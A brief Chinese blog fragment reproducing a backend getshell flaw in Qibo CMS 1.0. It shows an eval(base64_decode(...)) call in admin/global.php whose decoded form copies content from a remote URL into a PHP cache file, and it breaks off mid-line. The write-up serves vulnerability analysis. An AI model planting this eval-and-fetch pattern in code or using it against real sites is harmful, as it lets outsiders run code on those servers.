齊博1.0全版本後臺getshell漏洞復現

思路整理並詳細說明了一下 01 用戶登陸判斷的地方admin/global.php 在用戶不存在地方呢執行了一個eval(): eval(base64_decode("Y$webdb[_Notice]")); 該參數打印出來: copy("http://www.php168.com/Notice/?url=$webdb[www_url]",PHP168_PATH."cache/Notice.php
相關文章
相關標籤/搜索